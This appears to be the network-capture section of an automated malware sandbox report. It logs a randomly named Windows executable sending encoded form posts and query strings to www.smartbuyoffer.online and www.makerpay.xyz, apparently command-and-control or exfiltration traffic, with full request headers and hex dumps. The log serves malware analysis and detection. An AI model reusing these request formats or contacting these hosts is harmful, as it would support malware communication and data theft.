                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED]
                                                                                                                            Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            39192.168.11.2049758108.179.252.152802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:17.714005947 CET1289OUTPOST /fid8/ HTTP/1.1
                                                                                                                            Host: www.smartbuyoffer.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.smartbuyoffer.online
                                                                                                                            Referer: http://www.smartbuyoffer.online/fid8/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 65 6e 68 56 6a 49 33 75 41 65 45 36 39 2b 6e 74 36 42 47 39 47 63 33 33 62 55 34 4e 4f 6a 7a 2b 70 69 4f 70 4a 47 6d 2f 30 4d 5a 55 41 4a 71 45 47 70 54 6b 6a 2b 46 64 4a 74 6d 74 48 58 73 33 56 2b 47 68 6d 6b 6b 6f 34 2b 39 72 37 73 68 38 71 67 44 4d 62 73 71 6d 2b 52 55 72 37 65 5a 43 33 66 67 70 6f 2b 77 69 67 56 74 4a 4b 33 66 4e 58 48 50 6d 4c 43 5a 5a 53 6a 65 4b 65 6c 72 69 35 70 6b 58 49 73 6d 55 2f 62 63 58 2f 74 56 57 6d 47 4f 34 47 38 4e 66 4a 79 4a 47 61 54 72 7a 6b 2b 49 37 72 42 56 32 73 42 65 63 46 69 54 6e 71 49 41 67 42 34 74 75 6d 52 45 54 51 78 6a 4c 4a 64 46 64 37 68 74 44 34 58 34 4d 43 76 39 63 43 73 47 68 51 65 30 56 6a 50 41 77 70 2b 59 62 76 74 54 6e 30 71 61 71 47 72 33 53 70 6f 32 53 65 32 62 70 65 32 46 53 7a 34 46 63 71 6e 2b 71 35 42 47 75 7a 57 52 59 61 34 66 33 72 31 44 39 38 58 6a 70 6b 4d 45 6b 57 69 68 43 65 79 63 43 38 78 36 57 41 6f 47 6a 30 64 46 49 4d 31 54 7a 5a 7a 6b 65 63 62 49 43 48 52 66 32 70 4c 50 55 33 35 6f 6b 56 32 58 47 79 58 49 73 4a 75 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=enhVjI3uAeE69+nt6BG9Gc33bU4NOjz+piOpJGm/0MZUAJqEGpTkj+FdJtmtHXs3V+Ghmkko4+9r7sh8qgDMbsqm+RUr7eZC3fgpo+wigVtJK3fNXHPmLCZZSjeKelri5pkXIsmU/bcX/tVWmGO4G8NfJyJGaTrzk+I7rBV2sBecFiTnqIAgB4tumRETQxjLJdFd7htD4X4MCv9cCsGhQe0VjPAwp+YbvtTn0qaqGr3Spo2Se2bpe2FSz4Fcqn+q5BGuzWRYa4f3r1D98XjpkMEkWihCeycC8x6WAoGj0dFIM1TzZzkecbICHRf2pLPU35okV2XGyXIsJuxLKkGYHhKzEVdsPV+WNDVYaxEDxAV7b4aKZzDuMT4BrgxorJKUyqTNxn1YObmc+C8ka8Tkp5f1MibgloezNzyn14OPfP9OWxNZxIwMzkyMq3BvYwA2+1uZ/BpLvOoWMkI2cniypY2jqLTa8HivyaLHaYRtwEJXQT0L9XN3oWps5n1zjXcgfloH/uwGCbL2mTa/kSqtgJtxtg+EiE0D0ypdIo430lmJhS8Lvj0gp3VJsVugCtjkyX35Aek7iPD9LMxKaTTSPk7RTyPnnpcJSLOt4GL5IEOsrpFNIqTffqePGdSzjmlkWdlBzhaQFAmWBU0ftXFtFIqcGYMJ2A1PUOlL9zIV/hhy3S1vptYqp58JvaSoAz7GE6Pb/um6P
                                                                                                                            Nov 12, 2024 15:32:17.714052916 CET1289OUTData Raw: 72 52 6b 49 62 6e 66 35 36 4c 45 76 50 43 34 4a 53 52 44 49 71 73 79 41 46 6c 56 6a 4d 6e 71 54 38 78 37 79 4e 56 63 73 4e 57 2b 49 34 4b 2f 6f 70 5a 57 39 33 63 49 57 79 30 52 6b 49 72 4d 47 31 58 69 50 50 6a 52 6c 48 6e 79 5a 4c 72 6a 6a 6e 50
                                                                                                                            Data Ascii: rRkIbnf56LEvPC4JSRDIqsyAFlVjMnqT8x7yNVcsNW+I4K/opZW93cIWy0RkIrMG1XiPPjRlHnyZLrjjnPo0lXHEqtPYeLNrvZ8bZdv3PmKIZjjuKRlRJKDeyv6EWYnd6zh0tzj6f8wAs9p2ngBsgS8uxisC4gqRDqRtrUFXDWZdTpVpGEpH0Wu6M6fjQcsKa6S2ToLsJgNdMuCFdYH9zifCSRnI8b4H33zIPEytyak1XHFr7TD
                                                                                                                            Nov 12, 2024 15:32:17.714103937 CET5362OUTData Raw: 74 35 57 52 44 54 69 51 74 4d 50 57 30 53 61 48 35 4c 73 36 39 57 4d 6d 38 71 78 6b 4f 4f 49 64 68 76 77 38 7a 4e 7a 6a 38 39 79 65 50 6e 70 63 33 64 52 42 4c 66 4d 53 58 70 38 52 51 44 55 53 77 54 34 76 74 37 5a 50 50 55 47 30 36 4f 52 63 6f 77
                                                                                                                            Data Ascii: t5WRDTiQtMPW0SaH5Ls69WMm8qxkOOIdhvw8zNzj89yePnpc3dRBLfMSXp8RQDUSwT4vt7ZPPUG06ORcowGNTXYgW3uTallsZsCxq2Pj0TuK7zlKGsUI9nO5auyG0Z8lVSOdOCbpvviFJMp7BGTLMzPE4qKsW9w0W9RdOcZ/BU2Oli7hHvtXmB6KkEFE1IbJz73Qd+G3nPcnX4ufCZrNZGs/iZBU91rBkoTOM3odJXZQhxdq/uZ
                                                                                                                            Nov 12, 2024 15:32:17.840478897 CET1121INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:32:17 GMT
                                                                                                                            Server: Apache
                                                                                                                            Upgrade: h2,h2c
                                                                                                                            Connection: Upgrade, close
                                                                                                                            Last-Modified: Tue, 04 Oct 2022 14:01:30 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Content-Length: 836
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED]
                                                                                                                            Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            40192.168.11.2049759108.179.252.152802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:20.360177040 CET483OUTGET /fid8/?mRu=TlJ1g/LEHcod8cWOxAq9FP73H09YVH7WgnCIHnyD26ULKZOEEsjMueNmMu+sImVaRLKPh0l5mf17vNoqkS6RVPulxmIy09RerMB73PEzvxMXDGvmWRP6LAE=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.smartbuyoffer.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:32:20.485378981 CET1289INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:32:20 GMT
                                                                                                                            Server: Apache
                                                                                                                            Upgrade: h2,h2c
                                                                                                                            Connection: Upgrade, close
                                                                                                                            Last-Modified: Tue, 04 Oct 2022 14:01:30 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 2361
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x192"> <link rel="apple-touch-icon" [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:32:20.485502005 CET1289INData Raw: 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e
                                                                                                                            Data Ascii: images/favicons/favicon-120.png" sizes="120x120"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-180.png" sizes="180x1
                                                                                                                            Nov 12, 2024 15:32:20.485512018 CET45INData Raw: 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: </div> </div> </body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            41192.168.11.204976013.248.169.48802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:25.839689970 CET747OUTPOST /lp9q/ HTTP/1.1
                                                                                                                            Host: www.makerpay.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.makerpay.xyz
                                                                                                                            Referer: http://www.makerpay.xyz/lp9q/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 65 69 45 55 6d 4f 57 79 51 61 74 67 31 6e 50 66 67 4d 2f 64 4d 6b 41 53 4f 59 43 4a 6b 54 46 76 33 32 38 64 68 4c 34 79 78 58 6e 64 49 63 36 30 50 44 57 36 42 68 4f 41 50 56 74 67 64 4e 6c 6d 33 5a 62 61 5a 4a 6d 68 33 6a 36 4d 53 5a 61 6e 66 51 35 6c 6b 79 52 79 2b 4d 35 47 4c 78 4e 37 30 48 2f 6b 68 31 44 77 36 66 6d 61 62 6b 62 72 52 75 32 55 53 4d 53 71 36 70 30 54 72 69 54 4d 32 4b 73 69 30 33 43 76 37 51 6a 35 6c 35 61 49 42 34 49 6b 4b 32 7a 76 36 38 66 4f 69 39 6e 63 48 2f 55 4f 79 51 30 42 4f 33 42 31 57 4e 54 4d 46 71 65 54 41 65 77 75 54 76 34 74 6b 4d 57 32 77 41 3d 3d
                                                                                                                            Data Ascii: mRu=eiEUmOWyQatg1nPfgM/dMkASOYCJkTFv328dhL4yxXndIc60PDW6BhOAPVtgdNlm3ZbaZJmh3j6MSZanfQ5lkyRy+M5GLxN70H/kh1Dw6fmabkbrRu2USMSq6p0TriTM2Ksi03Cv7Qj5l5aIB4IkK2zv68fOi9ncH/UOyQ0BO3B1WNTMFqeTAewuTv4tkMW2wA==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            42192.168.11.204976113.248.169.48802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:28.511244059 CET767OUTPOST /lp9q/ HTTP/1.1
                                                                                                                            Host: www.makerpay.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.makerpay.xyz
                                                                                                                            Referer: http://www.makerpay.xyz/lp9q/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 65 69 45 55 6d 4f 57 79 51 61 74 67 36 6e 2f 66 73 4c 6a 64 62 30 41 54 51 49 43 4a 74 7a 46 72 33 32 34 64 68 4b 39 71 32 6c 54 64 49 39 4b 30 56 43 57 36 47 68 4f 41 58 46 73 4c 53 74 6c 78 33 59 6e 53 5a 4c 69 68 33 69 65 4d 53 63 2b 6e 66 6a 42 6b 72 43 52 73 33 73 35 45 50 78 4e 37 30 48 2f 6b 68 7a 76 61 36 66 2b 61 61 58 54 72 52 50 32 4c 4d 63 53 70 39 70 30 54 68 79 54 49 32 4b 74 48 30 7a 4b 4a 37 57 76 35 6c 39 57 49 42 73 63 6e 54 47 7a 70 30 63 65 38 73 73 4b 6f 4c 4d 55 44 2f 7a 45 66 41 6e 45 4b 58 62 65 57 59 59 71 33 44 4e 73 63 58 66 42 46 6d 4f 58 74 74 4e 56 6e 5a 57 4d 4c 59 4b 6e 69 42 65 37 64 79 76 58 72 35 78 41 3d
                                                                                                                            Data Ascii: mRu=eiEUmOWyQatg6n/fsLjdb0ATQICJtzFr324dhK9q2lTdI9K0VCW6GhOAXFsLStlx3YnSZLih3ieMSc+nfjBkrCRs3s5EPxN70H/khzva6f+aaXTrRP2LMcSp9p0ThyTI2KtH0zKJ7Wv5l9WIBscnTGzp0ce8ssKoLMUD/zEfAnEKXbeWYYq3DNscXfBFmOXttNVnZWMLYKniBe7dyvXr5xA=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            43192.168.11.204976213.248.169.48802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:31.178062916 CET1289OUTPOST /lp9q/ HTTP/1.1
                                                                                                                            Host: www.makerpay.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.makerpay.xyz
                                                                                                                            Referer: http://www.makerpay.xyz/lp9q/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 65 69 45 55 6d 4f 57 79 51 61 74 67 36 6e 2f 66 73 4c 6a 64 62 30 41 54 51 49 43 4a 74 7a 46 72 33 32 34 64 68 4b 39 71 32 6c 72 64 4a 50 79 30 50 6c 4b 36 48 68 4f 41 4a 56 74 73 53 74 6c 73 33 59 2f 57 5a 4c 75 62 33 68 32 4d 54 2f 47 6e 58 79 42 6b 77 53 52 73 6f 38 35 48 4c 78 4e 75 30 48 76 6f 68 7a 66 61 36 66 2b 61 61 57 6a 72 59 2b 32 4c 4f 63 53 71 36 70 31 53 72 69 54 67 32 4b 46 78 30 7a 4f 2f 6e 32 50 35 6c 64 47 49 48 5a 49 6e 4d 32 7a 72 35 38 65 6b 73 73 47 33 4c 4d 4a 38 2f 79 67 6c 41 6b 55 4b 57 2f 6a 69 4d 35 71 79 56 72 74 56 65 74 35 69 77 2f 79 2b 31 4d 74 35 4a 6d 4d 6c 61 50 54 6c 4a 59 37 73 6d 4d 6a 52 67 48 5a 6d 67 59 63 5a 33 79 56 43 37 62 37 41 75 48 4c 44 34 6f 46 2b 53 59 45 5a 52 42 77 61 78 61 49 4c 6e 73 4f 77 55 4e 6e 72 63 46 65 45 72 52 59 30 32 69 72 56 48 45 43 5a 4f 51 67 71 34 74 49 38 37 6d 6a 43 64 44 69 37 74 53 35 6f 34 4e 36 44 57 61 33 55 66 69 71 71 68 4d 43 74 67 56 66 64 7a 6a 51 39 50 74 70 4e 38 58 70 36 6e 6c 34 6e 57 30 71 71 48 71 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=eiEUmOWyQatg6n/fsLjdb0ATQICJtzFr324dhK9q2lrdJPy0PlK6HhOAJVtsStls3Y/WZLub3h2MT/GnXyBkwSRso85HLxNu0Hvohzfa6f+aaWjrY+2LOcSq6p1SriTg2KFx0zO/n2P5ldGIHZInM2zr58ekssG3LMJ8/yglAkUKW/jiM5qyVrtVet5iw/y+1Mt5JmMlaPTlJY7smMjRgHZmgYcZ3yVC7b7AuHLD4oF+SYEZRBwaxaILnsOwUNnrcFeErRY02irVHECZOQgq4tI87mjCdDi7tS5o4N6DWa3UfiqqhMCtgVfdzjQ9PtpN8Xp6nl4nW0qqHqe2cU6KGMR9Yw4yDYwa0eho//p0XRwrNz309PYtYYtNOvvjPzDWryFDUp5bF38naRoJzpyQu/cYU7BD3KWBAvx4Q0vyh19JfQZP60CejACc2kSzwIR+HL+EfQVWcHxBcio0c3hPd8ZTkJR06kBDtCxBTkAme5C2YWeyrnnI0UJQUMDQ1+uUhB4kPKr4p/4UxaJKb7TdsKuViAFMLvsC/kLsko5gV1lryIuOwfMWuPyKDnlV2/gNayaq7UJsqmuD2y/1YQVFLE0x9hZYOtki0tDgH660pcNym1ssxHmU/U3pCH1aGIFPvuS5nFii4Qx9a7STv5JG/CW6Nmeujtjhqnxe2lAs2nG49RMpTEqcN4zgHcaq02Xpjy7ZI4NiDM/lsYyEjiR+J3TsWnyYtD9hY
                                                                                                                            Nov 12, 2024 15:32:31.178126097 CET6627OUTData Raw: 76 56 45 4c 73 4d 43 6a 64 7a 43 6f 58 49 77 39 38 4f 4d 66 4d 55 49 66 30 7a 39 47 68 7a 6c 65 39 58 67 38 4d 74 71 2b 45 59 58 6a 63 54 61 34 2f 74 35 42 6d 44 66 32 50 46 45 2b 4d 79 6d 42 57 44 5a 6e 6b 6a 49 53 70 76 52 4f 4b 6c 71 6e 42 74
                                                                                                                            Data Ascii: vVELsMCjdzCoXIw98OMfMUIf0z9Ghzle9Xg8Mtq+EYXjcTa4/t5BmDf2PFE+MymBWDZnkjISpvROKlqnBtg5xCfwzjx3NLspGkVN04/u7T+mmis72OkgLZDpyqE0Q1qSR3bky1x2x3syzX1kfm3X9aY7RUsO8mpWsMi9C5SK46Qz1PwR2syVtzrOUiZRNXPqeyJrStIK+85hNq9eAbmyey2x3h0U0cKjQ8g6IFb1tycXYTAqd6K


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            44192.168.11.204976313.248.169.48802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:33.841876984 CET475OUTGET /lp9q/?mRu=Tgs0l5rQdINE0HmohrfgPmtVT9TM6mRmz28qlq5N+W6TIOOkclTpEHygPFllR64ZyPP4U6P7xjaKPMS0ZS1/tTAw9ro2DSZN0V3b+mDHt47uSUTeFI2WDZw=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.makerpay.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:32:33.976891994 CET388INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Tue, 12 Nov 2024 14:32:33 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 248
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 52 75 3d 54 67 73 30 6c 35 72 51 64 49 4e 45 30 48 6d 6f 68 72 66 67 50 6d 74 56 54 39 54 4d 36 6d 52 6d 7a 32 38 71 6c 71 35 4e 2b 57 36 54 49 4f 4f 6b 63 6c 54 70 45 48 79 67 50 46 6c 6c 52 36 34 5a 79 50 50 34 55 36 50 37 78 6a 61 4b 50 4d 53 30 5a 53 31 2f 74 54 41 77 39 72 6f 32 44 53 5a 4e 30 56 33 62 2b 6d 44 48 74 34 37 75 53 55 54 65 46 49 32 57 44 5a 77 3d 26 55 4a 3d 37 48 31 58 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
